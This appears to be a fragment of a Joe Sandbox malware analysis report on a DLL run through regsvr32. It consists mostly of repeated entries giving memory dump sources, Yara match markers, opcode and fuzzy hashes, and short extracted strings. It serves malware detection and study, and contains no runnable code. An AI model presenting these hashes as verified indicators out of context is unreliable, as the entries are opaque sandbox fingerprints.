                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: <+o
                                                                                                                            • API String ID: 0-2035106886
                                                                                                                            • Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                            • Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
                                                                                                                            • Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                            • Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 2d
                                                                                                                            • API String ID: 0-3866551247
                                                                                                                            • Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                            • Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
                                                                                                                            • Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                            • Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ZF{;
                                                                                                                            • API String ID: 0-2351138993
                                                                                                                            • Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                            • Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
                                                                                                                            • Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                            • Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: o^
                                                                                                                            • API String ID: 0-3380573087
                                                                                                                            • Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                            • Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
                                                                                                                            • Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                            • Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8N
                                                                                                                            • API String ID: 0-1657423088
                                                                                                                            • Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                            • Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
                                                                                                                            • Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                            • Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: J3n
                                                                                                                            • API String ID: 0-3694000235
                                                                                                                            • Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                            • Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
                                                                                                                            • Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                            • Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c&A
                                                                                                                            • API String ID: 0-649646960
                                                                                                                            • Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                            • Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
                                                                                                                            • Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                            • Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (3
                                                                                                                            • API String ID: 0-2570504824
                                                                                                                            • Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                            • Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
                                                                                                                            • Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                            • Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: [r\^
                                                                                                                            • API String ID: 0-4041245994
                                                                                                                            • Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                            • Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
                                                                                                                            • Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                            • Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: [[x
                                                                                                                            • API String ID: 0-2553898450
                                                                                                                            • Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                            • Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
                                                                                                                            • Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                            • Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: g\&
                                                                                                                            • API String ID: 0-1994035986
                                                                                                                            • Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                                                                            • Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
                                                                                                                            • Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                                                                            • Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #X
                                                                                                                            • API String ID: 0-1684620495
                                                                                                                            • Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                            • Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
                                                                                                                            • Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                            • Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: GfMu
                                                                                                                            • API String ID: 0-241548529
                                                                                                                            • Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                            • Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
                                                                                                                            • Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                            • Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: k|
                                                                                                                            • API String ID: 0-998972391
                                                                                                                            • Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                            • Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
                                                                                                                            • Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                            • Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: wz_
                                                                                                                            • API String ID: 0-2163964638
                                                                                                                            • Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                            • Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
                                                                                                                            • Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                            • Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: {?Q
                                                                                                                            • API String ID: 0-927583641
                                                                                                                            • Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                            • Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
                                                                                                                            • Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                            • Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: |}6\
                                                                                                                            • API String ID: 0-3074799505
                                                                                                                            • Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                            • Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
                                                                                                                            • Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                            • Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 3&a
                                                                                                                            • API String ID: 0-537350193
                                                                                                                            • Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                            • Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
                                                                                                                            • Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                            • Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: o0:X
                                                                                                                            • API String ID: 0-645126758
                                                                                                                            • Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                            • Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
                                                                                                                            • Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                            • Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: D4}
                                                                                                                            • API String ID: 0-491520632
                                                                                                                            • Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                                                                            • Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
                                                                                                                            • Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                                                                            • Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1583075380-0
                                                                                                                            • Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                            • Instruction ID: 0f73e15f2c471f80c8c776e2fcbb883eafff6e9c0bf18ed7f3c7649fad24361a
                                                                                                                            • Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                            • Instruction Fuzzy Hash: 80A1D422B1C69592DB689F36A6157BEEA52FB857C0F088035DE8D1FA46DE3CE001D711
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                            • Instruction ID: 19ba4a0ac387a7a68ff571f20a23fb9d54bbd5f81d08d45aa41d029fcac04496
                                                                                                                            • Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                            • Instruction Fuzzy Hash: 6671F772F1C1AA8BD31CCB19E9416B8AA96E7E4305F588035D58DCEB94EE39F900DF11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                            • Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
                                                                                                                            • Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                            • Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                            • Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
                                                                                                                            • Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                            • Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                            • Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
                                                                                                                            • Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                            • Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                                                                            • Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
                                                                                                                            • Opcode Fuzzy Hash: f7aced778150c02bbca5db0e3f41738242a846810a111e238ccae7171f94d46c
                                                                                                                            • Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                            • Instruction ID: dbb4fad0742d9b29c59b9a64f17438fc1cba9462e735a4e3b2d00d7b8da19945
                                                                                                                            • Opcode Fuzzy Hash: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                            • Instruction Fuzzy Hash: 4C5192B490038E8FCB48CF69C84A5DE7BB1FB48358F104A19FC26A6250D7B4D665CF94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
